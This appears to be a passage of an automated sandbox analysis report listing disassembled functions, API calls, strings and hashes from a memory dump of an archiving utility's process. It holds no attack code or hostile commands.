                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                      • Instruction ID: ee0a466629fe71f5535c25506cc1b8dcf243b7f9b82d960716c79f2e9345e5a8
                                                                                                                                                                      • Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                      • Instruction Fuzzy Hash: 46A1FB62B0878245FB68AF588000B7DA691AF84BA4FD66637D95D277C5EF3CD446C320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A27428 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3659116390-0
                                                                                                                                                                      • Opcode ID: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                      • Instruction ID: 06e20125fa423b071573efbabde6004a2b209852db25fe66b786b196be689f77
                                                                                                                                                                      • Opcode Fuzzy Hash: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                      • Instruction Fuzzy Hash: 5751E332A14A5186E714DF69D444BADBBB0FB84798F849136DF0E57A98DF38D142C720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79D80C0 Relevance: 7.6, APIs: 5, Instructions: 118fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CharHandleWrite$ByteConsoleFileMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 643171463-0
                                                                                                                                                                      • Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                      • Instruction ID: f2c41f2ab90ecf1bf56c09e4c1d97e9d0cb3e014d5f2c6a6aeffb2b563d4f395
                                                                                                                                                                      • Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                      • Instruction Fuzzy Hash: EF41F812E0864242F928BB249545ABDE251BF85BA4FC81337ED6D176D6DE3CE4478720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79D7514 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 189COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcschr$BeepMessage
                                                                                                                                                                      • String ID: ($[%c]%ls
                                                                                                                                                                      • API String ID: 1408639281-228076469
                                                                                                                                                                      • Opcode ID: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                                                                                                                                      • Instruction ID: 8e0f7b2b4fa3d131a77874baed9a3cb5adabde44427a67b2f772ade468093d19
                                                                                                                                                                      • Opcode Fuzzy Hash: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                                                                                                                                      • Instruction Fuzzy Hash: 5681C823608A5282EA64EF15E4806BEA7A1FB84788FD80536EF4D57759EF3CD543C710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79E3528 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00007FF7D79E359E
                                                                                                                                                                      • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7D79E35E6
                                                                                                                                                                        • Part of subcall function 00007FF7D79E30C8: GetFileAttributesW.KERNELBASE(00000800,00007FF7D79E305D,?,?,?,?,?,?,?,?,00007FF7D79F4126,?,?,?,?,00000800), ref: 00007FF7D79E30F0
                                                                                                                                                                        • Part of subcall function 00007FF7D79E30C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF7D79F4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF7D79E3119
                                                                                                                                                                      • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7D79E3651
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFileswprintf$CurrentProcess
                                                                                                                                                                      • String ID: %u.%03u
                                                                                                                                                                      • API String ID: 2814246642-1114938957
                                                                                                                                                                      • Opcode ID: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
                                                                                                                                                                      • Instruction ID: 5dfd51451f74d7dea88e781fa2c4e8a9645b452caf1b3cc4d8737b38f4b18173
                                                                                                                                                                      • Opcode Fuzzy Hash: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
                                                                                                                                                                      • Instruction Fuzzy Hash: 7D312A2261898252EB14AB38E4116BEE660BB847B8FD01733E97E47BE1DE3DD4078710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A27854 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                      • String ID: U
                                                                                                                                                                      • API String ID: 2456169464-4171548499
                                                                                                                                                                      • Opcode ID: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                                                                                                                                      • Instruction ID: 4b76c2ca52e3382d6e2c5c24f482da5584067cf1240ae3521c26a4c8a48365d9
                                                                                                                                                                      • Opcode Fuzzy Hash: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B41A322B19B4182E754AF69E4447AEA761F784794FC05032EE4D87784DF3CD542C750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A1D7BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 2280078643-1018135373
                                                                                                                                                                      • Opcode ID: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                      • Instruction ID: 3745a345e12f063295a8892f1970bb5aa12a80edf3f53ec77fffe2085e5703a0
                                                                                                                                                                      • Opcode Fuzzy Hash: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E21447AA0864186F634EF19E04066EB761F7C4BA5F801236DE9D03B95CF3CE842CB20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79F42CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcschr$swprintf
                                                                                                                                                                      • String ID: %c:\
                                                                                                                                                                      • API String ID: 1303626722-3142399695
                                                                                                                                                                      • Opcode ID: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                                                                                                                                      • Instruction ID: 128eb4fde14258d603e8c63ed911c0f945b48f6a52ff32f9506983ce7faaa9e9
                                                                                                                                                                      • Opcode Fuzzy Hash: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                                                                                                                                      • Instruction Fuzzy Hash: 0A115E23A0874281EE247F11964106DF260AF85BD4BD89536DF6E537E6EF7CE4638321
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A0B780 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                      • String ID: Thread pool initialization failed.
                                                                                                                                                                      • API String ID: 3340455307-2182114853
                                                                                                                                                                      • Opcode ID: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                                                                                                                                      • Instruction ID: 3ff59f91e31a2b29dae0e5c867fc3ec5c08f0e1205619f856c3c87566885931d
                                                                                                                                                                      • Opcode Fuzzy Hash: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                                                                                                                                      • Instruction Fuzzy Hash: A9110632B0564186F7489F29E4447AE76A2EBC4B49FC8843BCA4D07299CF3DD4578750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79E3818 Relevance: 6.1, APIs: 4, Instructions: 129filetimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF7D79DF6FC,00000000,?,?,?,?,00007FF7D79E097D), ref: 00007FF7D79E38CD
                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,?,?,?,00007FF7D79DF6FC,00000000,?,?,?,?,00007FF7D79E097D,?,?,00000000), ref: 00007FF7D79E391F
                                                                                                                                                                      • SetFileTime.KERNEL32(?,?,?,?,?,00007FF7D79DF6FC,00000000,?,?,?,?,00007FF7D79E097D,?,?,00000000), ref: 00007FF7D79E399B
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00007FF7D79DF6FC,00000000,?,?,?,?,00007FF7D79E097D,?,?,00000000), ref: 00007FF7D79E39A6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Create$CloseHandleTime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2287278272-0
                                                                                                                                                                      • Opcode ID: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
                                                                                                                                                                      • Instruction ID: 0c2145007d4eef6275893e2c3c5d0500a8d15a12abab94ec7f321ea7e33056d2
                                                                                                                                                                      • Opcode Fuzzy Hash: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
                                                                                                                                                                      • Instruction Fuzzy Hash: 3841D423B0E64242EA54AB25E41177EE7A1BB817A8FD04232EE9D477E4DF7CD40B8710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A10244 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
